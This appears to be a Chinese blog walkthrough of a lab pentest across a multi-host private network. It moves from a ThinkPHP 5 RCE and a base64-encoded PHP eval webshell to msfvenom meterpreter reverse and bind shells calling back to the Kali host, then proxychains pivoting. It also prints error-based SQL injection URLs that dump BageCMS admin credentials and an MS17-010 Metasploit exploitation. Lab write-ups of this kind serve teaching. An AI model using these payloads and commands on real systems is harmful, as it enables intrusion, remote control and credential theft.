系统 | ip | 备注 |
kali | 192.168.15.162 | 攻击机 |
centos | 192.168.15.161(外) 192.168.22.128(内) | web服务器 |
ubuntu | 192.168.22.129 192.168.33.128 | 内网web服务器 |
Windows7 | 192.168.33.33 | 内网机器 |
先用nmap扫描一下,看看目标主机开放了哪些端口
sudo nmap -T4 -O 192.168.15.161
可以看到,目标主机开放了8888,3306端口,和888宝塔phpmyadmin默认端口,初步判断是由宝塔搭建的一个php网站
直接访问,发现是一个TP5框架
该版本的TP框架有命令执行漏洞,我们直接上exp
写入一句话木马
echo "<?php @eval($_POST[‘cmdte’]) ?>" > shell.php
可以看到,$POST被拦了
我们对我们的一句话木马进行一下编码
echo "PD9waHAgQGV2YWwoJF9QT1NUWydjbWR0ZSddKTsgPz4=" | base64 -d >shell.php
成功绕过
我们用蚁剑连接
看看权限
我们用kali生成一个木马弹个shell回来,方便后续的渗透
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.15.162 lport=6666 sessioncommunicationtimeout=0 sessionexpirationtimeout=0 -f elf >shell.elf
通过蚁剑上传
开启监听
msfconsole use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp show options set LHOST 192.168.15.162 set LPORT 6666 exploit
给权限,执行
弹回会话
看一下内网网段的地址
run get_local_subnets
因为后面的主机是内网的,所以我们要使用代理
先添加一条路由
run autoroute -s 192.168.22.0/24
挂起会话
我们要使用socks代理,可以搜一下相关模块
选择模块
因为5版本的socks有时会有问题,所以我们选择4a的版本
设置ip
我们还要改一下 /etc/proxychains4.conf 这个配置文件,把ip改成kali的ip地址
开启代理
接下来,我们用nmap扫描内网web服务器开放的端口
proxychains nmap -Pn -sT 192.168.22.129
根据开放端口判断,又是个宝塔搭建的php网站
我们在kali里用火狐挂代理访问
proxychains firefox
是一个八哥cms
为了方便后续的渗透,我们在windows下使用代理工具
通过robots找到后台地址
进入后台,尝试弱口令失败
寻找注入点,在index.php找到一处注入点,典型的报错注入
查库名
http://192.168.22.129/index.php?r=vul&keyword=1' and extractvalue(1,concat(1,(select database())))--+
查用户
http://192.168.22.129/index.php?r=vul&keyword=1' and extractvalue(1,concat(1,(select user())))--+
查表
http://192.168.22.129/index.php?r=vul&keyword=1' and extractvalue(1,concat(1,(select table_name from information_schema.tables where table_schema='bagecms' limit 1,1)))--+
查列名
http://192.168.22.129/index.php?r=vul&keyword=1' and extractvalue(1,concat(1,(select column_name from information_schema.columns where table_name='bage_admin' limit 0,1)))--+
http://192.168.22.129/index.php?r=vul&keyword=1' and extractvalue(1,concat(1,(select column_name from information_schema.columns where table_name='bage_admin' limit 1,1)))--+
http://192.168.22.129/index.php?r=vul&keyword=1' and extractvalue(1,concat(1,(select column_name from information_schema.columns where table_name='bage_admin' limit 2,1)))--+
查数据
http://192.168.22.129/index.php?r=vul&keyword=1' and extractvalue(1,concat(1,(select concat(username,password) from bage_admin limit 0,1)))--+
MD5解密
成功进入后台
模板插入一句话木马
蚁剑连接
msf生成木马
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=12345 -f elf >shell2.elf
开启监听,蚁剑上传木马执行
proxychains msfconsole use exploit/multi/handler set payload linux/x64/meterpreter/bind_tcp set rhost 192.168.22.129 set lport 12345 show options exploit
成功弹回会话
看一下路由
添加一条路由
run autoroute -s 192.168.33.0/24 run autoroute -p
挂起会话
扫描内网win7开放了哪些端口
proxychains nmap -Pn -sT 192.168.33.33
445端口开放,初步判定存在ms17_010
使用ms17_010攻击
use exploit/windows/smb/ms17_010_psexec set payload windows/meterpreter/bind_tcp set rhost 192.168.33.33 exploit
成功拿下
#如无特别声明,该文章均为 原创,转载请遵循
署名-非商业性使用 4.0 国际(CC BY-NC 4.0) 协议,即转载请注明文章来源。
#最后编辑时间为: 2023-01-22 12:51:52